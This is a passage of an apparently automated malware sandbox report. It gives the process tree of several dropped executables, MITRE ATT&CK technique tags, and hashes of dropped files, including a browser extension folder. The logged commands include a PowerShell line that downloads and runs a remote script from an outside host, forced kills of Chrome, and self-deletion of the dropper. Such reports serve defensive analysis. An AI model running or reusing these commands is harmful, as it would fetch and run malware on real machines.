  - - C:\Users\Admin\AppData\Local\Temp\3f-7d0c6-2e7-d7b95-7db473445374c\Dypysulibe.exe
      "C:\Users\Admin\AppData\Local\Temp\3f-7d0c6-2e7-d7b95-7db473445374c\Dypysulibe.exe"
      4⤵
      Checks computer location settings
      Executes dropped EXE
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:3896
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\q2rofbz0.sob\gcleaner.exe /mixfive & exit
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:1020
      - C:\Users\Admin\AppData\Local\Temp\q2rofbz0.sob\gcleaner.exe
        
        C:\Users\Admin\AppData\Local\Temp\q2rofbz0.sob\gcleaner.exe /mixfive
        6⤵
        Checks computer location settings
        Executes dropped EXE
        
        PID:1788
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1788 -s 452
        7⤵
        Program crash
        
        PID:4636
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1788 -s 772
        7⤵
        Program crash
        
        PID:4292
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1788 -s 768
        7⤵
        Program crash
        
        PID:5220
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1788 -s 844
        7⤵
        Program crash
        
        PID:5464
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1788 -s 852
        7⤵
        Program crash
        
        PID:5812
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1788 -s 984
        7⤵
        Program crash
        
        PID:6064
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1788 -s 1020
        7⤵
        Program crash
        
        PID:872
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1788 -s 1364
        7⤵
        Program crash
        
        PID:5264
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c taskkill /im "gcleaner.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\q2rofbz0.sob\gcleaner.exe" & exit
        7⤵
        
        PID:5360
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /im "gcleaner.exe" /f
        8⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:5288
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1788 -s 1404
        7⤵
        Program crash
        
        PID:5640
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\k05dfmnz.viz\handdiy_2.exe & exit
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:928
      - C:\Users\Admin\AppData\Local\Temp\k05dfmnz.viz\handdiy_2.exe
        
        C:\Users\Admin\AppData\Local\Temp\k05dfmnz.viz\handdiy_2.exe
        6⤵
        Executes dropped EXE
        Drops file in Program Files directory
        Suspicious use of AdjustPrivilegeToken
        
        PID:4280
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c taskkill /f /im chrome.exe
        7⤵
        
        PID:3792
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /f /im chrome.exe
        8⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:3416
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe"
        7⤵
        Enumerates system info in registry
        Modifies data under HKEY_USERS
        Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of FindShellTrayWindow
        Suspicious use of SendNotifyMessage
        
        PID:5920
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffe96e29758,0x7ffe96e29768,0x7ffe96e29778
        8⤵
        
        PID:5964
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1796 --field-trial-handle=1612,i,4325090859388777806,7901383823729091192,131072 /prefetch:2
        8⤵
        
        PID:3396
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2152 --field-trial-handle=1612,i,4325090859388777806,7901383823729091192,131072 /prefetch:8
        8⤵
        
        PID:5832
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2216 --field-trial-handle=1612,i,4325090859388777806,7901383823729091192,131072 /prefetch:8
        8⤵
        
        PID:5576
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=3112 --field-trial-handle=1612,i,4325090859388777806,7901383823729091192,131072 /prefetch:1
        8⤵
        
        PID:5424
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3248 --field-trial-handle=1612,i,4325090859388777806,7901383823729091192,131072 /prefetch:1
        8⤵
        
        PID:752
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --extension-process --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3868 --field-trial-handle=1612,i,4325090859388777806,7901383823729091192,131072 /prefetch:1
        8⤵
        
        PID:5336
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=4704 --field-trial-handle=1612,i,4325090859388777806,7901383823729091192,131072 /prefetch:1
        8⤵
        
        PID:1040
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4884 --field-trial-handle=1612,i,4325090859388777806,7901383823729091192,131072 /prefetch:8
        8⤵
        
        PID:4700
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4960 --field-trial-handle=1612,i,4325090859388777806,7901383823729091192,131072 /prefetch:8
        8⤵
        
        PID:2660
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5200 --field-trial-handle=1612,i,4325090859388777806,7901383823729091192,131072 /prefetch:8
        8⤵
        
        PID:5324
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5380 --field-trial-handle=1612,i,4325090859388777806,7901383823729091192,131072 /prefetch:8
        8⤵
        
        PID:4132
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\flvynsmj.nnc\chenp.exe & exit
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:4228
      - C:\Users\Admin\AppData\Local\Temp\flvynsmj.nnc\chenp.exe
        
        C:\Users\Admin\AppData\Local\Temp\flvynsmj.nnc\chenp.exe
        6⤵
        Checks computer location settings
        Executes dropped EXE
        Suspicious use of SetWindowsHookEx
        
        PID:2592
        
        C:\Users\Admin\AppData\Local\Temp\flvynsmj.nnc\chenp.exe
        
        "C:\Users\Admin\AppData\Local\Temp\flvynsmj.nnc\chenp.exe" -h
        7⤵
        Executes dropped EXE
        Suspicious use of SetWindowsHookEx
        
        PID:4640
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\a4susxpc.ll0\pb1117.exe & exit
        5⤵
        
        PID:4776
      - C:\Users\Admin\AppData\Local\Temp\a4susxpc.ll0\pb1117.exe
        
        C:\Users\Admin\AppData\Local\Temp\a4susxpc.ll0\pb1117.exe
        6⤵
        Executes dropped EXE
        
        PID:2320
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\5mvpqh5u.4ip\sqlcmd.exe & exit
        5⤵
        
        PID:3452
      - C:\Users\Admin\AppData\Local\Temp\5mvpqh5u.4ip\sqlcmd.exe
        
        C:\Users\Admin\AppData\Local\Temp\5mvpqh5u.4ip\sqlcmd.exe
        6⤵
        Checks computer location settings
        Executes dropped EXE
        
        PID:4680
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd.exe" /c "powershell -command IEX(New-Object Net.Webclient).DownloadString('https://www.imagn.world/storage/debug2.ps1')"
        7⤵
        
        PID:1836
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -command IEX(New-Object Net.Webclient).DownloadString('https://www.imagn.world/storage/debug2.ps1')
        8⤵
        Blocklisted process makes network request
        Suspicious use of AdjustPrivilegeToken
        
        PID:2444
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\5mvpqh5u.4ip\sqlcmd.exe" >> NUL
        7⤵
        
        PID:5652
        
        C:\Windows\SysWOW64\PING.EXE
        
        ping 127.0.0.1
        8⤵
        Runs ping.exe
        
        PID:5832

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 456 -p 1788 -ip 1788
1⤵
PID:112

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:4560

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 1788 -ip 1788
1⤵
PID:112

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 472 -p 1788 -ip 1788
1⤵
PID:5176

C:\Windows\system32\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\db.dll",open
1⤵
- Process spawned unexpected child process
PID:5272
- C:\Windows\SysWOW64\rundll32.exe
  rundll32.exe "C:\Users\Admin\AppData\Local\Temp\db.dll",open
  2⤵
  - Loads dropped DLL
  PID:5292
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 5292 -s 572
    3⤵
    - Program crash
    PID:5356

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 492 -p 5292 -ip 5292
1⤵
PID:5332

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 1788 -ip 1788
1⤵
PID:5420

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 1788 -ip 1788
1⤵
PID:5720

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 1788 -ip 1788
1⤵
PID:6044

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 568 -p 1788 -ip 1788
1⤵
PID:3376

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 1788 -ip 1788
1⤵
PID:5420

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 1788 -ip 1788
1⤵
PID:5544

C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"
1⤵
PID:5764

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Registry Run Keys / Startup Folder

T1060

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Web Service

T1102

Credential Access

Credentials in Files

T1081

Discovery

Query Registry

T1012

Remote System Discovery

T1018

Software Discovery

T1518

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Program Files\nndannfdnoaiphfcbbpgkhodebpoiocf\background.html

Filesize
786B

MD5
9ffe618d587a0685d80e9f8bb7d89d39

SHA1
8e9cae42c911027aafae56f9b1a16eb8dd7a739c

SHA256
a1064146f622fe68b94cd65a0e8f273b583449fbacfd6fd75fec1eaaf2ec8d6e

SHA512
a4e1f53d1e3bf0ff6893f188a510c6b3da37b99b52ddd560d4c90226cb14de6c9e311ee0a93192b1a26db2d76382eb2350dc30ab9db7cbd9ca0a80a507ea1a12

Download Submit
C:\Program Files\nndannfdnoaiphfcbbpgkhodebpoiocf\icon.png

Filesize
6KB

MD5
362695f3dd9c02c83039898198484188

SHA1
85dcacc66a106feca7a94a42fc43e08c806a0322

SHA256
40cfea52dbc50a8a5c250c63d825dcaad3f76e9588f474b3e035b587c912f4ca

SHA512
a04dc31a6ffc3bb5d56ba0fb03ecf93a88adc7193a384313d2955701bd99441ddf507aa0ddfc61dfc94f10a7e571b3d6a35980e61b06f98dd9eee424dc594a6f

Download Submit
C:\Program Files\nndannfdnoaiphfcbbpgkhodebpoiocf\js\aes.js

Filesize
13KB

MD5
4ff108e4584780dce15d610c142c3e62

SHA1
77e4519962e2f6a9fc93342137dbb31c33b76b04

SHA256
fc7e184beeda61bf6427938a84560f52348976bb55e807b224eb53930e97ef6a

SHA512
d6eee0fc02205a3422c16ad120cad8d871563d8fcd4bde924654eac5a37026726328f9a47240cf89ed6c9e93ba5f89c833e84e65eee7db2b4d7d1b4240deaef2

Download Submit
C:\Program Files\nndannfdnoaiphfcbbpgkhodebpoiocf\js\background.js

Filesize
20KB

MD5
762f2135679203a4b24a914538e7fea4

SHA1
40850e114c0a588661ff8475997b9ec8c1380934

SHA256
3e8e654cbf9ebde2ae7ad7c9922100837fc9a48b23d0662d905f097c0da4fe15

SHA512
e66e4d3985821114df76ace42597c1ffe0283a4fa911d464d45f8628cee4202a1a9c31c32cb4fb5dba572fbac0f611e9c0625c2d9e1eb309cdf1042f7297644d

Download Submit
C:\Program Files\nndannfdnoaiphfcbbpgkhodebpoiocf\js\content.js

Filesize
3KB

MD5
c31f14d9b1b840e4b9c851cbe843fc8f

SHA1
205e3a99dc6c0af0e2f4450ebaa49ebde8e76bb4

SHA256
03601415885fd5d8967c407f7320d53f4c9ca2ec33bbe767d73a1589c5e36c54

SHA512
2c3d7ed5384712a0013a2ebbc526e762f257e32199651192742282a9641946b6aea6235d848b1e8cb3b0f916f85d3708a14717a69cbcf081145bc634d11d75aa

Download Submit
C:\Program Files\nndannfdnoaiphfcbbpgkhodebpoiocf\js\jquery-3.3.1.min.js

Filesize
84KB

MD5
a09e13ee94d51c524b7e2a728c7d4039

SHA1
0dc32db4aa9c5f03f3b38c47d883dbd4fed13aae

SHA256
160a426ff2894252cd7cebbdd6d6b7da8fcd319c65b70468f10b6690c45d02ef

SHA512
f8da8f95b6ed33542a88af19028e18ae3d9ce25350a06bfc3fbf433ed2b38fefa5e639cddfdac703fc6caa7f3313d974b92a3168276b3a016ceb28f27db0714a

Download Submit
C:\Program Files\nndannfdnoaiphfcbbpgkhodebpoiocf\js\mode-ecb.js

Filesize
604B

MD5
23231681d1c6f85fa32e725d6d63b19b

SHA1
f69315530b49ac743b0e012652a3a5efaed94f17

SHA256
03164b1ac43853fecdbf988ce900016fb174cf65b03e41c0a9a7bf3a95e8c26a

SHA512
36860113871707a08401f29ab2828545932e57a4ae99e727d8ca2a9f85518d3db3a4e5e4d46ac2b6ba09494fa9727c033d77c36c4bdc376ae048541222724bc2

Download Submit
C:\Program Files\nndannfdnoaiphfcbbpgkhodebpoiocf\js\pad-nopadding.js

Filesize
268B

MD5
0f26002ee3b4b4440e5949a969ea7503

SHA1
31fc518828fe4894e8077ec5686dce7b1ed281d7

SHA256
282308ebc3702c44129438f8299839ca4d392a0a09fdf0737f08ef1e4aff937d

SHA512
4290a1aee5601fcbf1eb2beec9b4924c30cd218e94ae099b87ba72c9a4fa077e39d218fc723b8465d259028a6961cc07c0cd6896aa2f67e83f833ca023a80b11

Download Submit
C:\Program Files\nndannfdnoaiphfcbbpgkhodebpoiocf\manifest.json

Filesize
1KB

MD5
05bfb082915ee2b59a7f32fa3cc79432

SHA1
c1acd799ae271bcdde50f30082d25af31c1208c3

SHA256
04392a223cc358bc79fcd306504e8e834d6febbff0f3496f2eb8451797d28aa1

SHA512
6feea1c8112ac33d117aef3f272b1cc42ec24731c51886ed6f8bc2257b91e4d80089e8ca7ce292cc2f39100a7f662bcc5c37e5622a786f8dc8ea46b8127152f3

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751

Filesize
717B

MD5
ec8ff3b1ded0246437b1472c69dd1811

SHA1
d813e874c2524e3a7da6c466c67854ad16800326

SHA256
e634c2d1ed20e0638c95597adf4c9d392ebab932d3353f18af1e4421f4bb9cab

SHA512
e967b804cbf2d6da30a532cbc62557d09bd236807790040c6bee5584a482dc09d724fc1d9ac0de6aa5b4e8b1fff72c8ab3206222cc2c95a91035754ac1257552

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751

Filesize
192B

MD5
326b6dd428c8606098df9819563bca39

SHA1
fa6efd55aa868a7243df3b1156e6b8af4c215283

SHA256
c54865514537d7fa418aa0b5f07f42335955e2e21b9c203d32068988ea5e32fd

SHA512
0c7419638b5b9f689692afeb164e2ecc51b024a2cc9b74e40149b82bfe530edeff732a577c9bef942682eab8c4478147a937e5e7d32806a2f5133eb2fef4ce6e

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

Filesize
2KB

MD5
ec1e66de5779425b96df0f0a918a5213

SHA1
0591fb41d341f3744d5dbd9febdc03373ad746dc

SHA256
3f6b8292b4006b7519170e6c53abdbbedbc85e8b22d4fb0f9081a34a40f5309b

SHA512
bde0ff18aa43cee8a0bddca59f516776374297330231fdcc85dce41c2d8b57318a133fcc55b80c224c1e3d5acca97568751fd5427908dd9639680c29c9b90057

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

Filesize
866B

MD5
82d418f93c23baf9494014da35b09a5c

SHA1
1d24320fcb59398477c6c93eb192e1768cd344c3

SHA256
f1eaa4448d19ff72c525fc6fe85a718bef11f76e179a428421e2e085489ccd1f

SHA512
0c168f5d1a6a9009c0546af65a41f3bd2d30daef16cf60504a49724a0c400ea487d23b79ad50563ad4294fd1ee89a34d12c03dff255744d73d1dd707c0901080

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

Filesize
866B

MD5
2fa47d5e3b193c771433837b72eebdfc

SHA1
ef8b3e882c7f6f0968ff2f99db87b5224a45a426

SHA256
9b850193b24389a07c13a5325f780a945cca9cef7dd5dcc9f9892487d575f432

SHA512
299b8e5bcf1a84de520374918687c96d5d2609cdb2dc6efc6d308885fd0f922bd9e5acee516c4e7f5c7550103fec9811585122d43e979532fc3ed4b3d25470c8

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

Filesize
872B

MD5
bdb680ff1fd5fd7eb702d13010062b18

SHA1
01770111c6cabd8459df679fc618e14d3687cb60

SHA256
774c91e58026ade835f98efec738365361f8e1651a0a284a0f0e57fb872b0a70

SHA512
d5787df4b3c83acadee487f982bf236b997d495b734b79fd08a3780375981ea571cdc2ae085d45c27b319972f3c6c49ac02f960b5b520726bd09b7cc178b4561

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
4KB

MD5
dcb7fb60276062f1cb19ec418562b963

SHA1
aca741094b12c2b91f6c6e525f467a815cc1bb17

SHA256
914595c8999c2e95e3eddf7fec7115829ab2c7bd2352a9ba51ee2b9dc267f45c

SHA512
21d8f30423ba2b221431d1854a84741741e4c8396ddff361c99cc91274c896643c4a7f05cccfefa6e1f850f06a1d41c1f2eabeb0385f931b9562345952d48ad3

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
4KB

MD5
65a1c6367d8880013e1aacbe96d197a1

SHA1
2128e3bbba69a6d3f0f47965100673de0753aad1

SHA256
2d37028d909c9ab08503616849cf36e670b0ec6ccb327a295371a9dc7af35c38

SHA512
b2c28852fed40df241d2a156b25123a7d3e3eb7d1acdfb54eca946797abdda8560116f3e1af78dcf63d1c1c2129fe879098c7249ea7419cfd2268e3ae564f9e4

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
4KB

MD5
2e332ebcac6c26757d824e0bb6800641

SHA1
712c3171eba0fc99d32b70e5647fae0845eb31ed

SHA256
7c0330685408f5a043c681b7fe094314ba6b3c9c63fe7d2ae2c8428230720c8a

SHA512
85169ac26c8de1ff98eebd980fccaaa07be48255eb7cb540bdfe79d9b49cfb6ee97c1004fe97bd3317d852a8dc813e4c7789540629af9a0f9f629103fd77eb1b

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences

Filesize
11KB

MD5
7374347769000209e7265c8232208b10

SHA1
5aeaf4b344aa465afd6cc6e1831d5a2a1a4f07d0

SHA256
a51358bceef037490c08acbccf5336396f3fbe8f00e3c941b25c76c4bb8439ba

SHA512
544a949ca9a5c6ac540b4e7a1cf759a2581c0240b4f27116c374fbfd66e3daec99f92a1c8b0695c337297fbdbc60f6695ce390fc9440f67bf69278c357aaf929

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\c1c4419d-f308-4cc0-af81-fc81120fc769.tmp

Filesize
11KB

MD5
b44beee3c2c323a15b2854f5b3afa377

SHA1
bae1f47675c50f363d6cee5a3942d91e8cb56bb3

SHA256
c87d6788737a486a12e621e522286d431cc92683f596c8f6e5f9e563abd74f3c

SHA512
ebdfbabdafafd2318c27fcc1859331501a3b6ab2e707c25cf9718ca8467e396e1d87cff1e72c96d1efabc89ca2c2c4846b3eda62be051f81bf5ae9462d424cf2

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

Filesize
143KB

MD5
320281dd650e964f8724b9a115b59361

SHA1
8dd63e4c078ab0d72f4b0127bf442d0bb2ec4591

SHA256
44543e6fb7274a46483e67d60f071c2a03836fef007744dbce928bfaae5119e6

SHA512
74b4690845188bfdaa598e812eb49084e3d23e8c0d714e1af1dac6b310f800053c3e0306d28578ad677712af9e930055b488b870d108104faa785a9f780f2b76

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
b8c9383861d9295966a7f745d7b76a13

SHA1
d77273648971ec19128c344f78a8ffeb8a246645

SHA256
b75207c223dfc38fbb3dbf03107043a7dce74129d88053c9316350c97ac26d2e

SHA512
094e6978e09a6e762022e8ff57935a26b3171a0627639ca91a373bddd06092241d695b9f3b609ba60bc28e78a5c78cf0f072d79cd5769f1b9f6d873169f0df14

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
91fa8f2ee8bf3996b6df4639f7ca34f7

SHA1
221b470deb37961c3ebbcc42a1a63e76fb3fe830

SHA256
e8e0588b16d612fa9d9989d16b729c082b4dd9bfca62564050cdb8ed03dd7068

SHA512
5415cd41f2f3bb5d9c7dadc59e347994444321cf8abe346b08e8c5a3fc6a5adae910eda43b4251ba4e317fbb7696c45dba9fd5e7fa61144c9b947206c7b999c4

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
48B

MD5
dbf847a864194e73d575ec9a99dfe680

SHA1
08fff5e55a248886a0c39c2ab25ebddbe19f6ca2

SHA256
45aadd9997003cd4136cebc1f3afbd5f5ef359a5f2f7b4c9ba1364068f384f45

SHA512
ca248dae63379733c6cc467e7972c86a2f924fd2d6ff89f46fbce258bd0415269d9bbe3a60149c76bd8c2c7a306d47cf9e80ac392784a609c1e5d4c74aa989b9

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
192B

MD5
e93d1273781099b80bdeeb5671ce8da4

SHA1
766393203fd0b168c8c4b963062a7c2ae28b2b3a

SHA256
478d479524a2c7bed6e6ab4801a762fc3faa3537637c4e552e537f968a2e6947

SHA512
1d50c6599d20b125305dbc075aa2ba9c2d65d23f6ee59b42d79a9bff0b19e78b73f3d06467882a1c8e1d79cd19b9af346af22df38e8727d7a5e4b6f7cfb0357d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Edge Profile.ico

Filesize
70KB

MD5
e5e3377341056643b0494b6842c0b544

SHA1
d53fd8e256ec9d5cef8ef5387872e544a2df9108

SHA256
e23040951e464b53b84b11c3466bbd4707a009018819f9ad2a79d1b0b309bc25

SHA512
83f09e48d009a5cf83fa9aa8f28187f7f4202c84e2d0d6e5806c468f4a24b2478b73077381d2a21c89aa64884df3c56e8dc94eb4ad2d6a8085ac2feb1e26c2ef

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb\LOG

Filesize
331B

MD5
66aacae72e52b2f15a3977f89e84ce29

SHA1
8ab6e973e7e2b5d42b1e75fe44441f16d494f5ca

SHA256
bdee7439a75d3c6d0a8e3a5c432c9b83c5a42cfa8d09c0fc40b2354ae85235fc

SHA512
7d837a41974e49728ef39e2e649778c2472f780c2f01d795c00351795ea24bc7c0f80a54a14f807bc9061231bf0483fbe02668df44772fc4ded10ca64dc7f005

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Microsoft Edge.lnk

Filesize
2KB

MD5
2c8f5fb73e9f4de401c71566a80072c1

SHA1
370427a165b6367f96bbbdf5df04b2d62ae9db1b

SHA256
77f244e72a544135bdfd75ccb3ef24119f681a7ddb457604729b63cdd30862dd

SHA512
474290ee63f9eb8120db51e1fd3c8e88c8bb468576e3e2e53c59dd7d090ea042fc6efe71d1f66eccb3b99d6cbf965ca56367f4c4c15fa32496eac8f7d68bf1fc

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

Filesize
111B

MD5
285252a2f6327d41eab203dc2f402c67

SHA1
acedb7ba5fbc3ce914a8bf386a6f72ca7baa33c6

SHA256
5dfc321417fc31359f23320ea68014ebfd793c5bbed55f77dab4180bbd4a2026

SHA512
11ce7cb484fee66894e63c31db0d6b7ef66ad0327d4e7e2eb85f3bcc2e836a3a522c68d681e84542e471e54f765e091efe1ee4065641b0299b15613eb32dcc0d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

Filesize
682B

MD5
604c9fbe0c58f9a378f3b55ccc85d9df

SHA1
7a895f271e7926e8c3b9bb606d3eb2a31b83a9f8

SHA256
f884d71e492d7d2f21d00a9890d4f850181f628249f00035d5363809b25e1d98

SHA512
